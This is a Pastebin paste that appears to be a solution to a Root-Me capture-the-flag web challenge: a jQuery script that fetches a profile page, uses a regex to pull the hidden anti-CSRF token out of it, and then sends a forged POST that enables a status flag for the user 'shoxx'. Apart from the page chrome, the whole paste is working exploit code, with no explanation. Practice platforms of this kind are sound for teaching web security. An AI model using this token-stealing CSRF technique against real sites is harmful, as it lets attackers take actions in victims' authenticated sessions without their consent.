Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <script src="http://code.jquery.com/jquery-1.11.0.min.js"></script>
- <script>
- function start(){
- $.ajax(
- { type: 'POST',
- url: 'http://challenge01.root-me.org/web-client/ch23/index.php?action=profile',
- contentType: 'application/x-www-form-urlencoded;charset=utf-8',
- dataType: 'text',
- data: '',
- success: extractToken
- }
- );
- }
- function extractToken(response){
- var regex = new RegExp('<input id="token" type="hidden" name="token" value="(.*)" />','gi');
- var token = response.match(regex);
- token = RegExp.$1;
- makeCSRF(token);
- }
- function makeCSRF(token){
- $.ajax({
- type:"POST",
- url:"http://challenge01.root-me.org/web-client/ch23/index.php?action=profile",
- data:'username=shoxx&status=on&token='+token
- })
- }
- setTimeout('start()', 2000);
- </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement